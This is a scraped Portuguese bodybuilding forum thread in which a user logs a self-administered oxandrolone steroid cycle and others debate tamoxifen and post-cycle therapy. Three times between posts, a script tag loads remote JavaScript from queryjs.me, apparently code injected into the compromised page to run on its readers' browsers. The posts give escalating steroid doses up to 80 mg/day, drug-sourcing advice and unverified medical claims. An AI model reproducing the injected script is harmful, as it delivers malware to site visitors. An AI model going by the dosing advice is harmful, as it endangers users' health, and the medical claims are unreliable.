Ir para conteúdo
  • Cadastre-se

Relato 1ºciclo Oxandrolona Masc. C/ Fotos


Posts Recomendados

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Pelo que eu já tinha lido no fórum me parecia o tamox além de prevenir a ginecomastia promovida pela aromatização de testo, ajudava na hepatotoxidade das drogas orais além de ajudar a estabelecer a produção endogena de testo.

Fui pesquisar um pouco mais agora e realmente não achei nenhuma informação confirmando sobre a proteção hepatotoxica e o boost na testo endógena.

Agora você tá de brincadeira comigo em me falar que a oxandrolona NÃO inibe o eixo de HPT e não inibe a produção endogena de testosterona. É OBVIO QUE INIBE CARALHO! Um ciclo de mais de 4 semanas de oxan com doses acima de 40mg/dia inibe sim o eixo e se não fizer uma tpc você corre risco SIM de ter seu eixo afetado pra sempre.

A oxandrolona é de fato muito mais branda do que qualquer outro anabolizante, mas isso não muda o fato dela ser uma droga e ser um anabolizante como qualquer outro. Quem usa a oxandrolona achando que não precisa fazer TPC e não precisa se preocupar com a inibição do eixo tá muito iludido com os prós que a oxandrolona leva sobre os outros anabolizantes.

Primeiro que não aromatiza, ja tira o uso dele ai em 50% ou mais porque ele é muito mais utilizado pra combater ginecomastia.

Segundo que pode tomar vitaminas e outros compostos menos prejudiciais que o tamoxifeno e restaurar sua produção bem mais rapdio. Tamoxifeno é tão tóxico quanto a Oxandrolona e pode ter efeitos colaterais bem chatos mas se voce acha que deve, manda bala champs.

Link para o comentário
Compartilhar em outros sites

Publicidade

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Primeiro que não aromatiza, ja tira o uso dele ai em 50% ou mais porque ele é muito mais utilizado pra combater ginecomastia.

Segundo que pode tomar vitaminas e outros compostos menos prejudiciais que o tamoxifeno e restaurar sua produção bem mais rapdio. Tamoxifeno é tão tóxico quanto a Oxandrolona e pode ter efeitos colaterais bem chatos mas se voce acha que deve, manda bala champs.

É brother... em fórum é assim, tem gente que não pesquisa e usa qualquer coisa como referência e ainda sai espalhando por aí como verdade. Não importa o que ficou alterado no pós ciclo, tem gente que acha que a TPC é uma receita de bolo e é igual pra todo mundo, é só usar tamox como base e tudo serão flores novamente. :P

Link para o comentário
Compartilhar em outros sites

voce tem seguido essas dosagens aí de 60mg dia? como está se sentindo.

muito bom seu relato pretendo fazer algo parecido.

valeu

Tenho sim, estou no 5ª dia da 4º Semana com 60mg (vou relatar mais em baixo como estou me sentindo)

Rtvz. Brow, vou começar o ciclo em breve. O que me sugere de pré-ciclo e tpc? Abras

Sei que a pergunta não foi pra mim, além das pesquisas sugiro:

1-Exames antes do ciclo

2-Boa dieta + Multivitamínicos, Magnésio e Zinco Quelato....

3-Planejamento do ciclo, treino e dieta.

4-Fonte confiável para aquisição da droga.

5-Disciplina, muita disciplina

E compartilhar com a galera :oneeyed01:

Link para o comentário
Compartilhar em outros sites

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Vai tomar o que ? Qual seu objetivo ?

Vou tomar somente oxadrolona.

1-2 semana 40mg

3-6- semanas 60 mg

7-8- semanas 80 mg

Meu objetivo é ganhar massa consistente (espero ganhar em torno de 3-5 kg) e baixar mais o BF. Atualmente meu BF esta em torno de 16-17, vou baixar pra 12-13 para então ciclar. Essa semana chega o super HD da Celucor e nos ultimos 15 dias do mês vou usar EC para conseguir baixar o bf até onde eu quero.

Link para o comentário
Compartilhar em outros sites

Semana 4
5º dia .
Fala galera, parei com os relatos diários pra economizar meu tempo e o tempo de vcs e pra informações ficarem mais centralizadas.
Vamo lá!!!!
Cagadas cometidas:
Somos adultos e humanos certo? e to aqui pra compartilhar boa parte do ciclo e pq não compartilhar os erros tbm?...
Galera, tenho me sentindo bem cansado, as vezes com uma fome da p@!##... juntando esses 2 elementos, por 2 dias meu corpo pediu muita caloria.... inclusive açuuuuuuucar!!! Não consegui me controlar :/ CAGUEIII para os macros e por dois dias mandei lazanhas, Crossant, doces, bolos, sorvete... Pensei que estava virando criança novamente... pqp, não sou de fazer isso.. mas estava com uma vontade descontrolada e fiz!
Consequências:
A oxandrolona não faz milagres e vi que a pança deu uma aumentada e a retenção foi inevitável.
Resumindo... dei uma zoada no Shape :mad:
Além dessa cagada... bebi pouca água, pois só pensava em comer!!! resultado... dores nos rins...
Correções:
Voltei hoje ao controle total...
Pra evitar o consumo de açucar e altas kcal de uma vez só, trouxe maças e bananas na mochila, Tapioca com peito de peru também...
Eu estava consumindo albumina com aveia e leite, ou as vezes ovos inteiros nos lanches...Acrescentei as frutas, pois acredito que a frutose vai segurar bastante esses possíveis descontroles.
Como estou me sentindo:
Como nosso amigo Conan falou, acredito que as 3 primeiras semanas (particularmente, principalmente a segunda) são as melhores em termos de ganhos de MM e força.
Como falei, estou no quinto dia da semana 4. Aquela puta força que vinha aumentando está cada vez mais branda... ainda sim mantenho as cargas que consegui aumentar com o uso nas 3 primeiras semanas.
Como relatei, ando cansado, por vezes desanimado. Isso tem prejudicado um pouco os treinos... e tenho aumentado o tempo de descanso entre as séries.
Em compensação, a libido continua alta... como costumo dizer:
Interesse sexual, paudurecencia matinal, espontanea e requisitadas estão 110%. Ejaculação também.
Mas esse cansaço tem me incomodado bastante. Ontem fiqui sonolento o dia todo.
Minha pele está normal, sem acnes nem nada...
Já o cabelo tá "meio palha" e percebi que a queda está um pouco maior do que já era antes do ciclo. Não sei dizer se é da Oxandrolona, ou fase...
Ganhos:
O aumento de força, densidade, definição foram mais perceptiveis nas 3 primeiras semanas... agora não tenho notado tanto. Apesar que minhas camisas e calças apertaram muito!!!!!!
Como relatei, ganhei 5kg desde o inicio do ciclo.
Poooooorém... fiquei esses dois dias com dieta louca. REsolvi fazer uma sauna seca.. e Jorrei mais agua que uma cachoeira!!!
Resumindo.. 1kg era de retenção hidrica (pesei antes da sauna e depois no dia seguinte)
Então são 4kg de ganhos por enquanto.
Colaterais:
-Dores nos rins (culpa toda minhas, pela baixa ingestão de água)
-Cansaço, sono, desamino. (que vai além daquela preguiça normal de nós humanos)
-Queda de cabelo: aumentou a que eu já tinha (não sei dizer se é fase, ou a Oxandrolona)
Colaterais que sumiram ao longo do ciclo:
-Dores de cabeça
-Sensibilidade nos mamilos (até hoje me questiono se machuquei ou foi a Oxan)
Planos e Expectativa:
Bom galera, como falei no inicio do relato iria levar o ciclo até 8 semanas se meu corpo reagisse bem.
O restante das capsulas ainda não chegaram :ohno01::ohno01::ohno01::ohno01: mas devem chegar entre hoje e amanhã e vou levar o ciclo até 8 semanas se for com 60mg... mas penso em aumentar a dose e fazer por 6 semanas.
Me dei bem com os multivitamicos antes do ciclo principalmente o Zinco quelato e magnésio quelato e a partir da semana que vem ja vou consumi-los pra ver se melhora esse cansaço.
Pretendo chegar a 86kg e com abdomen bem hipertrofiado.
Para isso, vou aumentar a ingestão de calorias (dessa vez, decentemeeeeente) e reduzir na ultima semana.. mandando aej e bastante peso nos abdominais!
É isso!
Qualquer dúvida postem ai e volto com o relato quando tiver mais novidades
Abs a todos... :king_right:
Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
×
×
  • Criar Novo...